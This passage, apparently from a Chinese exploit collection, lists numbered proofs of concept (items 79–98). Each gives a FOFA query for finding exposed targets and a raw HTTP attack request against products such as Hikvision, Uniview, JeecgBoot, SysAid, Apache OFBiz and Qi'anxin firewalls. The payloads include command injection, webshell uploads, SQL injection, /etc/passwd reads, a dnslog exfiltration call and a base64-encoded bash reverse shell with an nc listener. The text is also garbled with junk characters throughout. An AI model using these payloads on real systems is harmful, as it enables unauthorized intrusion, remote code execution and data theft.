U( t) F7 ^/ \------YsOxWxSvj1KyZow1PTsh98fdu6l
- s: x8 b) t s, X" i9 {$ X7 \Content-Disposition: form-data; name="target"9 s+ B2 g/ E: w8 m( _* Y
& ]% B) @3 p0 D" ?. [/Applications/SkillDevelopAndEHS/5 ^7 S" v9 G; A( k
------YsOxWxSvj1KyZow1PTsh98fdu6l--( h" ^7 n5 s8 X0 v+ U/ c7 A
$ S! b0 t9 O" o3 n( c5 [ [
, |4 v3 H3 s* `$ ^* L$ RGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.14 O" h1 I3 \" Z( _ l7 f
Host: x.x.x.x
9 \3 o6 z0 O3 I/ n0 x' I
& r+ u( z7 y* u: C: x* _5 t; R3 x% n
79. BYTEVALUE 百为流控路由器远程命令执行
# T& a9 _ N8 r/ Z5 j7 L: {FOFA:BYTEVALUE 智能流控路由器
8 l( W' N5 E2 M" yGET /goform/webRead/open/?path=|id HTTP/1.1; Z& _! o- F; g6 a$ S
Host:IP
/ ?/ j( ~& Z0 x! p, ]2 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
; ~6 V( ^7 \9 A+ Z$ Q* G; ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% O, K* V0 U7 b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
P1 V6 r1 V2 w1 k8 W' t5 kAccept-Encoding: gzip, deflate
5 n4 p, n" j* V" O+ C; C# p: `Connection: close
! ?4 K( }7 W3 qUpgrade-Insecure-Requests: 1" |, M9 W' |: M, E5 j' ~; W
* i$ u$ r1 ]% A, f+ Y
, Y" [, N; \* L6 G; O4 e( ]80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
) @8 {0 k6 I# p5 L3 s, TFOFA:app="速达软件-公司产品"
' d. E- }+ G$ q6 {3 RPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1+ S! Q6 z8 q# x# F! z2 V6 v$ d
Host: x.x.x.x7 |3 Z# _) e) k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- d+ l, H* t& P k Y1 |Content-Length: 27
% b( m6 Q! ^2 U+ c+ a1 c% C2 TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! @3 a1 `: b" q8 V
Accept-Encoding: gzip, deflate
- y2 c- `, k3 C/ I4 PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- Y7 h& s# ^# S3 h1 I8 z
Connection: close1 M E4 o$ [6 W: j1 M
Content-Type: application/octet-stream
; O4 c5 R# x) eUpgrade-Insecure-Requests: 1- V+ c7 T/ c% Y4 H, Q' G! c* B; B
- j/ ]- S2 N8 e K# E I
<% out.print("oessqeonylzaf");%>9 W9 j, l* a9 N) [. q
! _9 @* W) a# H5 [8 ~: q; o3 B1 b+ k3 o3 w
GET /xykqmfxpoas.jsp HTTP/1.1
; u- @5 }2 N1 Q* T3 d9 U. }/ y* d) PHost: x.x.x.x' c7 c0 e1 C9 n- z7 Y0 K, J, Q' M0 K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) n8 N; n. d1 M. J1 t+ H& }/ [
Connection: close; ?, L# J# |/ L8 Q( D* R. N, C2 z8 a
Accept-Encoding: gzip+ e$ q+ U' N8 i8 F
( R# T; O5 Y& R/ a3 L* u4 u9 d( v$ R' b$ u4 o% s# B
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
% w/ y0 K. [6 ^: ^6 X/ Z) i xFOFA:app="uniview-视频监控"
& Q7 V3 d) s! T+ n! lGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
3 M9 i) o* |6 U" K' SHost: x.x.x.x% o# k& D1 L& D( ]" E# X4 Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 N* b2 s) j. m6 L
Connection: close
9 U o! T/ O' B8 K B+ c% I( hAccept-Encoding: gzip
% m$ c Z$ K3 a l) y. L7 L r- N2 B0 V
6 X, i6 s8 N5 s3 T9 L+ |/ S. h$ u7 T' w82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行' i# v& L; ^1 j" m8 w. o( H) t
FOFA:app="思福迪-LOGBASE"1 @; v; T( H9 K- p$ d
POST /bhost/test_qrcode_b HTTP/1.1
! o6 F) ?9 V2 P& v+ n5 fHost: BaseURL) j. @0 d0 q6 } w4 ]
User-Agent: Go-http-client/1.1! [4 E8 a7 t; A: c( J- W
Content-Length: 23
, B6 e/ J. F0 O" s) }& HAccept-Encoding: gzip6 I9 t( ]0 d% T0 q4 ]2 w& I9 N
Connection: close
, W9 d7 g \; m" A, j# ~Content-Type: application/x-www-form-urlencoded4 a& q: G I! L9 ]* X* m
Referer: BaseURL+ |! Z7 o: c: k: j$ O9 r) K; c
& t- k+ z: g9 g- o3 n, N; {5 l( \/ Sz1=1&z2="|id;"&z3=bhost
* ?0 X5 y; A' c; ~
# Y6 o* `: ]" A+ Y4 L" \7 w7 e6 A- O
83. JeecgBoot testConnection 远程命令执行# R! j' M8 D* F8 t' V* Q' S k, |6 r
FOFA:title=="JeecgBoot 企业级低代码平台"
8 p3 v, M5 o) z( ~$ I! Z$ Z- n8 U. }: C- Z. C! @0 ]
7 X }* y* a! W) I+ f2 b6 \$ H4 G
POST /jmreport/testConnection HTTP/1.1
2 D7 R9 Z4 n2 ?1 D2 @Host: x.x.x.x- k: \; Z" f2 G% G) I3 k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* r; j% w5 l8 `. L. {
Connection: close) G5 Z% H" |& f9 t! E- b
Content-Length: 8881
$ `, l* L6 C: ~! yAccept-Encoding: gzip* b, u' h' F2 r# y4 N; q8 P/ s
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"7 O% E% _# b6 b( {- I: c
Content-Type: application/json
- B+ H2 h+ _) t% _/ _* v. p
: ]3 D: q: t# g4 V# E% N8 lPAYLOAD
, @* [& q9 ^2 |! k/ r9 R; t1 p8 u
" b+ K: q, G! @+ K84. Jeecg-Boot JimuReport queryFieldBySql 模板注入2 ~3 L3 n- _( s% G* ~5 X
FOFA:title=="JeecgBoot 企业级低代码平台"
/ z4 ~, G( p: @% W p
0 f( l. x8 r( c" _# d
8 B2 @" ?/ O6 g& t/ g6 Y0 l
5 l+ m- [- S; m/ I: J, MPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
, k/ g9 d& Y7 [. y# |+ xHost: 192.168.40.130:8080
3 E' i, _, o g: I/ O x# wUser-Agent: curl/7.88.1
5 I2 p0 o( O! f: E+ aContent-Length: 1560 ~$ c- f9 m# B0 s1 N$ D
Accept: */*
F" z! f) e% I0 ^, KConnection: close# X" \7 b. h9 Q$ {' r) T9 h
Content-Type: application/json
- d, }' x) c' T& o3 T. ?5 W YAccept-Encoding: gzip5 I* w' f2 J+ ?5 ~: ]
- e& C3 P& X. [/ d
{3 ]2 C3 V _( N
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",1 |# [4 l0 l2 w. K
"type": "0"
- t7 n7 a8 B( w; |- w}
% T5 ~( Z' o, n& [
# x- M6 u. i0 u$ d O/ d$ e- |# v& ~0 f- z1 y, }
85. SysAid On-premise< 23.3.36远程代码执行
2 @$ r0 H7 t* y5 ~2 H* }7 _/ I8 ?CVE-2023-47246
' G' a9 f' u$ uFOFA:body="sysaid-logo-dark-green.png" * V3 U* M! \( J, a$ a
EXP数据包如下,注入哥斯拉马+ ] G. s- y; J- p$ U& \
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
6 {& f# U: r! yHost: x.x.x.x7 D6 h3 p, B# E* I' c0 F, p; \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! n- [4 O3 O" ?8 |
Content-Type: application/octet-stream
" l2 @9 `" R# V. dAccept-Encoding: gzip
1 x b/ D/ R! q% x4 E& p6 ?, ?: K2 X9 f7 X6 N
PAYLOAD( K' N# w7 L, C v8 a# T
" O! h$ R( E/ [4 Q. [: C) ?
回显URL:http://x.x.x.x/userfiles/index.jsp
; p$ {$ y( F; w0 {* F. @" A+ D: h) V
. A" K9 ^& k. p5 K- q# @2 x# X7 ^4 a86. 日本tosei自助洗衣机RCE5 W, S0 j+ D$ K
FOFA:body="tosei_login_check.php"6 T" J' [2 f; D
POST /cgi-bin/network_test.php HTTP/1.1
) v, J, U- P7 {+ c9 @% xHost: x.x.x.x
! L6 ^" E8 o8 P0 c% jUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
6 r- W f. y0 |) w7 t6 C% R, WConnection: close
8 t g V8 _' I9 mContent-Length: 44
, J, V+ c9 A$ O% `! v$ yAccept: */*
/ l! F. a1 X9 s& u( t6 c3 R& ?7 RAccept-Encoding: gzip
# Z/ T0 L" R. S9 Z. }Accept-Language: en$ g ?$ V, M# O& r; H5 A( K
Content-Type: application/x-www-form-urlencoded2 ` Z5 i* n8 s7 ?- L" Y
6 e$ o5 N& L/ X) W7 B0 F
host=%0acat${IFS}/etc/passwd%0a&command=ping
- u* j8 w0 N3 l% u: k" C! D. R' `; m+ z5 f
/ v o, |& W0 \% q1 z, T% h$ N87. 安恒明御安全网关aaa_local_web_preview文件上传
2 |( A* M6 T7 `6 nFOFA:title="明御安全网关"( a, t$ @0 z4 U* J+ J, \& r ^
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1" _6 o; a# g0 v5 U
Host: X.X.X.X; h: x2 S: z' U% ~0 t4 {7 k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# D2 o6 N9 Z: q* Q5 H! D
Connection: close3 `! ^+ r" s" L
Content-Length: 198
' ~5 `& S3 \/ a0 Q# D- W6 C7 JAccept-Encoding: gzip
7 w' [- A1 P! mContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
- B8 S/ a3 X0 ^
?1 V" G! n7 u$ |! E/ U--qqobiandqgawlxodfiisporjwravxtvd
0 J& J6 o! J3 A3 ]' PContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
E' h8 A+ N( |4 E, `$ |5 B$ X/ rContent-Type: text/plain
- v A+ R, F+ S5 J$ ]8 A) w8 d# C% r5 ?& s$ E
2ZqGNnsjzzU2GBBPyd8AIA7QlDq3 ~0 W0 r6 C. a1 Q8 T2 R, u9 @
--qqobiandqgawlxodfiisporjwravxtvd--
4 m% H% V5 y# L
- d* s! f3 s4 d* |) `# n; W& B3 n
/jfhatuwe.php, c0 S, o% |6 u1 ?( O, R! n
& C; J4 t7 R) i+ a88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行+ O$ i# f4 \" E( n, ]* e
FOFA:title="明御安全网关"
a1 j( t- g5 D- FGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
0 `9 S+ P: s8 T& g; D9 aHost: x.x.x.xx.x.x.x
9 q2 `, n7 t4 I. U3 N8 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ v' Q5 u9 c+ K4 |" x' I) y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ Z m- z, ?( t2 H4 R5 k. K
Accept-Encoding: gzip, deflate+ v* r9 F. U- N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ E$ b7 b6 |: s# y5 z" ^ uConnection: close6 p1 J4 c& y+ V1 ?# }: a5 F
/ b0 Z7 a& Y. _: ]: Z2 j/ V; N* S, G; E
/astdfkhl.php3 l* \: T( d$ u! N* c
# y" |* X8 `9 U- `2 a9 y j p2 f& q
89. 致远互联FE协作办公平台editflow_manager存在sql注入
; L# P) n* L: [1 p. c2 WFOFA:title="FE协作办公平台" || body="li_plugins_download"5 g" u# o' J5 N4 l6 ?. J8 e. Z7 j, e
POST /sysform/003/editflow_manager.js%70 HTTP/1.1, y) a6 W3 K K5 X
Host: x.x.x.x. `+ d% I2 O2 R: f8 E) l+ f+ W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ U: p$ e7 H; N3 R) H& v
Connection: close
2 Z& d" A2 T, _Content-Length: 41: H0 J1 A& L; U- D, D# Z" Q y( i; M3 m
Content-Type: application/x-www-form-urlencoded0 E- B( a# X. `
Accept-Encoding: gzip+ _& n/ V/ y3 ^1 a
' A; c ^4 j; I# ?2 woption=2&GUID=-1'+union+select+111*222--+- t$ Z7 Z3 B3 t/ R
$ W1 P' \' y2 r1 u$ d3 H2 D
4 I: [' z0 x) l0 M; s! ?) u6 ^90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行- j/ ]$ P4 t7 \# D
FOFA:icon_hash="-1830859634"( m) M. k: Z+ E1 ]
POST /php/ping.php HTTP/1.16 b5 U9 {: k% T0 z/ Q! C, |% n+ n
Host: x.x.x.x" q3 i* {; C* p( r5 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
3 w# P: ]3 }, R/ t" a- {Content-Length: 51
6 H) p; x4 m7 TAccept: application/json, text/javascript, */*; q=0.01
$ ^7 d$ P" S* r/ i! wAccept-Encoding: gzip, deflate1 b8 e5 u, d4 g% y |( y# |. H/ k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, ?' U: n/ x+ Z) y/ Q+ l9 BConnection: close% h# _# t7 `7 W" P# W
Content-Type: application/x-www-form-urlencoded
# A# W. k5 v2 F$ kX-Requested-With: XMLHttpRequest: h; N3 i b9 p
5 F+ d' B3 ^' g% ]jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
/ j- }2 [" b; S. F2 l$ K7 q1 H$ p. R6 ^- a) w! |
, b/ h% {( D" X$ ?( M$ p5 _$ x* D
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取1 M* v7 J2 C, l! _) T9 W
FOFA:title="综合安防管理平台"
7 w2 Q% [" b x& d2 x8 IGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.10 y3 I- H$ |! ?
Host: your-ip
* r; g+ z* Y' _0 a# w& ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
6 n% P" q* g1 e( w* \Accept-Encoding: gzip, deflate. c; \$ R0 ~- L7 c% m+ C
Accept: */*
" h! Q' e {, b6 {Connection: keep-alive$ U" z/ m% {: K! f, k/ R
$ _2 K1 e0 p% r# c. d
% Q3 [. k* o! ]4 y% e
7 c1 a6 ?& h) Q2 \92. 海康威视运行管理中心session命令执行2 y0 G$ g: w& j+ ]8 J# {
Fastjson命令执行( ?( B' b# }7 ^5 V- W3 ^
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
; l$ x$ h/ Q& z2 h6 E! E' n6 `POST /center/api/session HTTP/1.1
# f [+ b4 w& i- n0 R% g- iHost:
; z, _& t, \4 z! SAccept: application/json, text/plain, */*
. @* R' M; d: q* \: cAccept-Encoding: gzip, deflate
+ `% Y1 ]4 M2 ^4 k" }( aX-Requested-With: XMLHttpRequest$ Q# E. |, ?4 w& ^" w4 n$ L
Content-Type: application/json;charset=UTF-8
, B8 |& d3 L$ T1 N) C& ^9 mX-Language-Type: zh_CN1 W8 C3 c+ p' [3 B
Testcmd: echo test% h; S& g2 e# n; j( o% T* Y/ V( F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36) U' K. m5 N0 z, N+ K8 v
Accept-Language: zh-CN,zh;q=0.9
$ {7 o/ p$ B; [Content-Length: 5778: \6 L9 c* v+ p) w5 `
/ R, Q& [- M2 `! X4 W M
PAYLOAD
+ h4 e1 k" g/ J# o/ C6 d
. d- q! p! [8 \. M4 y; h) Q$ J2 B2 d9 ^; h2 F! g
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
* f e$ m. S! l U, L7 g6 S3 hFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="8 ?* Z+ w- b* Q
POST /?g=app_av_import_save HTTP/1.1
* w, b* n3 O; ^( f2 kHost: x.x.x.x
. @6 R+ h+ l" @) r/ {( i" EContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx, s1 I% m+ F7 J! ]9 f# [
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
M' l- N: A+ |2 T! F) b: [* N5 {7 j: \! p
------WebKitFormBoundarykcbkgdfx1 ~3 L: o: F5 M F( r6 n( |. K
Content-Disposition: form-data; name="MAX_FILE_SIZE"
1 i. p! U$ N. g& B4 L* A3 k, z( t; Z a, c7 B q
10000000& m1 V% D3 S# k, O
------WebKitFormBoundarykcbkgdfx- }& B4 y8 [3 {: c/ ]
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"$ u. ~; |" |" R+ j* W! F
Content-Type: text/plain
' r5 n6 ` G @3 N9 F+ h$ i$ E, M7 y
5 z2 l2 B% ], W5 `9 Q) b5 j0 {5 rwagletqrkwrddkthtulxsqrphulnknxa
( C, D9 q8 Z6 _: l------WebKitFormBoundarykcbkgdfx
0 R" S5 p! r: k4 mContent-Disposition: form-data; name="submit_post"
3 t+ M+ o2 u# t8 ?* Q9 o4 I+ Y7 Y7 ^! f1 `; a8 J
obj_app_upfile
: x$ J: A. i; K0 {* T$ }4 t9 ^------WebKitFormBoundarykcbkgdfx/ d: v3 w) U l& {4 H
Content-Disposition: form-data; name="__hash__", f3 k+ H! p, {$ `! Z
* [8 N9 Q/ a! b& f
0b9d6b1ab7479ab69d9f71b05e0e9445
, C4 q" g6 T5 N! C------WebKitFormBoundarykcbkgdfx--, x" t; R3 O. v' m
) D/ o5 Q) r. q r x( u
u8 s3 i3 x7 D! Y+ ~, z" BGET /attachements/xlskxknxa.txt HTTP/1.1
" B- @/ j9 X0 M" HHost: xx.xx.xx.xx
7 H5 s' W: d+ r% m1 MUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
7 x. e* ]' T' q+ K8 j B/ e
- M; u' j: z% u6 |! ~2 d! }" o# H& X& W( T- g/ V6 o
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
6 ^2 m9 r4 p: ]3 R8 F$ ~1 z4 mFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="# _2 \$ d4 k1 X! `* N5 D |# z! l5 I
POST /?g=obj_area_import_save HTTP/1.1
* d1 i( E3 t" N% i: vHost: x.x.x.x1 b7 f5 d g3 x, f3 w. I
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
6 i3 v! W3 w J* _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36# J( y( E# @# i- M4 v5 t
. e+ h6 I0 d( q. { Z
------WebKitFormBoundarybqvzqvmt
! `& |/ z- Q* d6 | C/ H/ R- W1 h5 Z5 GContent-Disposition: form-data; name="MAX_FILE_SIZE". a2 f2 @5 ~0 q7 b/ [' T
! _1 S: p; C& v10000000) A" T0 \2 j$ V6 J5 l0 S
------WebKitFormBoundarybqvzqvmt) C, p1 N' @* @' B
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
& e9 `5 I- [4 }$ \1 `. fContent-Type: text/plain
4 n( Z9 A8 F; P6 {% y
- S2 M, J4 b1 ypxplitttsrjnyoafavcajwkvhxindhmu. D& ^7 h! }$ f" g( {# c5 B
------WebKitFormBoundarybqvzqvmt
" D# q. A7 q, p. R3 [" [. }Content-Disposition: form-data; name="submit_post"
, W# Y2 Y' q5 T0 f4 ]; A. o
" z- i, V! }; `. E$ H D Sobj_app_upfile7 j) T3 H! L$ Y- F. U
------WebKitFormBoundarybqvzqvmt
! q! L/ q2 y7 q' k% u0 IContent-Disposition: form-data; name="__hash__"7 u4 r* z4 I" D g: K6 [5 J
4 T% Q% r; k) {6 k- k0b9d6b1ab7479ab69d9f71b05e0e9445
2 w, c& x8 {6 j* p$ T: n------WebKitFormBoundarybqvzqvmt--
) Y& I0 v" j7 e; O3 l$ c, H0 @0 t, I1 ~( W# ~- K
4 V* r- i5 x6 Q( Z) u
4 @. U! \/ r' X( ]4 t. `GET /attachements/xlskxknxa.txt HTTP/1.1
7 K$ ~( S( S, EHost: xx.xx.xx.xx
; \+ b; h4 G4 }. |% U' e- oUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36, W6 z3 x: r% ?4 j
) [6 {/ l- g# E# F7 Q
# e! @- B) @* V+ M: W# e
& s! N" H1 d* u/ X9 _9 G95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行# @6 J2 a% ]: @
CVE-2023-490706 B2 ]9 h, h8 d, v$ b
FOFA:app="Apache_OFBiz"
) O: W: B, {4 \ ?( ]. h8 k+ TPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.19 k, d8 \2 Y7 \6 q0 k
Host: x.x.x.x
) u3 ?6 k3 z, z# k: k2 m7 y2 uUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36! K" u; {6 F9 Q1 m- K m% u
Connection: close: C# V/ F) A8 x1 F. b2 j, j
Content-Length: 8894 W! }% T4 b! i# f/ \; [. i$ q& z
Content-Type: application/xml
2 P0 J' v5 H. p* \0 J" mAccept-Encoding: gzip
4 w) x5 V7 g) J: s6 C6 g' r1 _# \9 w& f' Z1 N
<?xml version="1.0"?>5 R$ j& I+ Z$ I7 q8 M
<methodCall>3 T4 W% U3 G: c" g+ T
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
4 `6 P+ G5 t# |' f4 u/ t <params>
. ?1 Y- R+ z/ \- ~& [ <param>
) [+ a- |) O: T/ a* V8 d. i <value>
' t3 `9 q- V! X) y' p# S& b' x <struct>
( t+ G8 U' r% _0 e9 ?! R0 I5 ~ <member>
' N8 P. ?3 [5 ^7 S0 D& J: u1 T <name>test</name>
s) _5 C! ^! T2 Z8 p <value>/ j* N" n$ I4 A& i# P4 B* R1 g
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
" V/ E1 u; L/ Z! b4 ?7 W </value>( ~) U4 X- g% j. W# I1 s
</member>/ ?- G" A. t( ^; s5 e$ H0 f
</struct>) r$ g9 M6 _) `1 X! m6 {, \
</value>
" X. j6 G4 Q* q2 u: s </param>7 Z* T5 o" I* z5 M' _+ e3 e
</params>
3 d! V1 Y3 n8 }9 Z& g! A</methodCall>
0 B u# [ u. ~$ ?. ~ N4 r y- h# ^3 l
9 ~3 a6 ]) [. D2 k5 v% q
用ysoserial生成payload8 E [- x9 B- n/ [9 Q$ r& N0 u
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
Q5 d1 t9 I! V2 i
' r4 S7 Z. v% u6 \; @$ Y6 i) X% o, T2 @1 }* i. R u# v4 j6 @
将生成的payload替换到上面的POC/ R9 D. Q+ q. B4 ?1 X4 Q. Z8 I2 J
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
( R" W! ^7 q7 z MHost: 192.168.40.130:8443
V" a5 c4 {" `" ~& J. M) ^, SUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36& O' Q2 j3 ?4 B, b
Connection: close) ~- c; d4 h7 ~3 N' v6 f5 b1 ]
Content-Length: 8890 u% [9 B9 i" x, @$ N( s W
Content-Type: application/xml
( \" |+ @$ k. d* LAccept-Encoding: gzip
& i' A( t6 K6 H0 f8 S: u$ j5 @7 T ]) ` Q g. p
PAYLOAD, D, H- J! b3 z
" @3 d8 F' S/ t* C) k) \9 p96. Apache OFBiz 18.12.11 groovy 远程代码执行
/ c/ i2 r, X1 A$ ~FOFA:app="Apache_OFBiz"6 w/ m) n4 f2 B7 V9 w5 A5 A
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1$ d3 _/ w5 M9 R; o$ n4 y
Host: localhost:8443
* f/ Z6 n$ f, ^) p, p! c0 M' G- ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0# z0 s8 [" X& z$ M8 f7 v3 `' ]. X
Accept: */*6 s: C" ]' ~: b' @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; M, e; C [! y# ~: pContent-Type: application/x-www-form-urlencoded
+ @( z& W4 C4 m; C* U. _3 c/ f" _0 JContent-Length: 55
\! ~5 V$ Z8 ^* l! |
3 h2 r/ p' X: ggroovyProgram=throw+new+Exception('id'.execute().text);
# \1 h2 g4 I$ V0 f! E8 y+ [1 V0 _! }8 q1 g* Z1 @+ O/ ^' k
! ~" h/ L2 e. c0 S# ^0 i2 t3 P反弹shell' ]) Z. B8 f# N
在kali上启动一个监听
7 E4 a% B& P( y" P3 c% t$ jnc -lvp 7777
& z0 N. B3 K$ M9 G) z
1 v( k* E) u" q! f( i) zPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1/ p9 f9 a# u5 T$ I( w% [
Host: 192.168.40.130:8443
6 T- x7 N3 @0 P1 m2 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
! C1 b0 i: p9 S3 v: K" qAccept: */*- R6 m" j7 y- u0 |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: M' p' B. X# C g
Content-Type: application/x-www-form-urlencoded
; m4 t5 J' m0 H3 _. AContent-Length: 71. I/ _7 w: J0 J; i" y; t, e
2 y3 P& w3 R; u/ mgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
( q& M7 ^$ r" q: Z, d& J$ z6 _3 a) d4 u; T
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
J# V8 E. X: _1 T, FFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"4 d- k/ h+ C0 U$ z
GET /passport/login/ HTTP/1.1
u! S) Z) K6 Y4 vHost: 192.168.40.130:8085. B; ]! A- x, s) u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 X8 x6 Z1 o5 k( s' w; t. g
Accept-Encoding: gzip
# v" J/ |$ f4 _, i. Z! q1 nConnection: close
1 n. P, {4 G* uCookie: rememberMe=PAYLOAD6 f: b% O" k! g8 @$ i2 {
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
2 R# }3 q/ G& _( e% m. \1 K* B) M: g2 x( U( L( p
* b- D$ X$ P+ O/ K7 T
98. SpiderFlow爬虫平台远程命令执行% ]2 M! d& b! F8 M2 y
CVE-2024-0195
+ `2 F1 R0 R* F- y* k' ]FOFA:app="SpiderFlow"! g }7 J% i8 o) O: M- o
POST /function/save HTTP/1.13 |8 Z/ w# @2 J8 s" q# H
Host: 192.168.40.130:8088
a' s* Z7 T% X- @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
